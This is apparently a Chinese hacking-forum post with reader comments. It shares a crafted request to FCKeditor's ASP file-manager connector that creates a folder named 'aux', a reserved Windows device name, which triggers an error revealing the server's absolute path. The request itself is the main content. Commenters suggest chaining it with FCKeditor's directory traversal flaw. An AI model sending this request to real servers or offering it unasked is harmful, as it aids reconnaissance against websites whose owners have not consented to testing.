FCKeditor爆绝对路径
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
版本未测试。。。
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
版本未测试。。。
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
评论58次
收藏
很不错的思路 谢谢分享
不错,收藏以备后用
呵呵,不错,值得收藏!
这个还是很有作用的,利用这个再配合fck的目录遍历漏洞,可以查看n多东西了!!
Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”“com1”“com2”“prn”“con”和“nul”等,因为这些名字都属于设备名称,等价于一个 DOS 设备好方法
收藏
纯属收藏。。
支持原创,收下了~
收藏,有时候可用到
为了不删号 这么老的贴都被楼上2位挖出来了 ^ ^
收一了
aux,这个亮了。
找不到路径的时候的好东西
果断收藏,只能是结合其他洞来用了
上次测试没有通过,不过还是做个记号,下次接着用,
收藏了感谢信Z分享
还是挺有用的
绝对路径有时候很宝贵
嗯 这个要顶